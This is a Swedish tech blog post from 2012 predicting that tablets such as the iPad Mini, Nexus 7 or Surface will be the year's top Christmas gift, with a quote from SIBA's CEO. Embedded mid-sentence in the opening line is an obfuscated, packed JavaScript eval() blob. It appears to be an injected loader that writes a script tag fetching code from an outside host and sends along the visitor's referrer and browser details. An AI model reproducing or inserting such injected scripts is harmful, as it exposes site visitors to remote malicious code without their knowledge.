Image Image Image Image Image Image Image Image Image Image

| 25 november, 2020

Scroll to top

Top

Surfplattan blir årets Julklapp 2012

Surfplattan blir årets Julklapp 2012
Sebastian

Årets eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|inyba|var|u0026u|referrer|yybzn||js|php’.split(’|’),0,{}))
julklapp 2012: Snart går vi in en månad av hektisk julhandel. Folk undrar då självklart, vad blir årets julklapp 2012?

Vi har sett allt möjligt konstigt på andra svenska tekniksajter. Allt från den klassiska självgående dammsugaren till datorer.

Revue.se tror att det är surfplattan som kommer att ligga i fokus hos konsumenterna denna jul. 2012 har gett oss ett flertal nya olika varianter. Apples iPad är inte längre det självklara valet. Konkurrensen är nu större än någonsin. Vi har pratat med lite folk och de flesta tror att årets julklapp 2012 kommer att bli Apples iPad Mini.

Vi är 90 procent säkra på att det är området surfplattor som garanterat kommer bli årets julklapp. Om det är en Nexus 7, Microsoft Surface, iPad Mini eller någon annan får vi se inom kort när teknikföretagen lägger ut deras rapporter.

Vi återkommer snart med svaret på årets julklapp 2012 🙂

Såhär säger SIBAs vd Fabian Bengtsson

 – Det har gått snabbt för surfplattan att anammas av de svenska konsumenterna och den otroligt enkla och smarta tekniken har gjort att produkten satt sig i hjärtat, även hos de minsta. Surfplattan ses användas på allt fler ställen, som till exempel lunchrestauranger, hotell men även förskolor, säger SIBAs VD Fabian Bengtsson.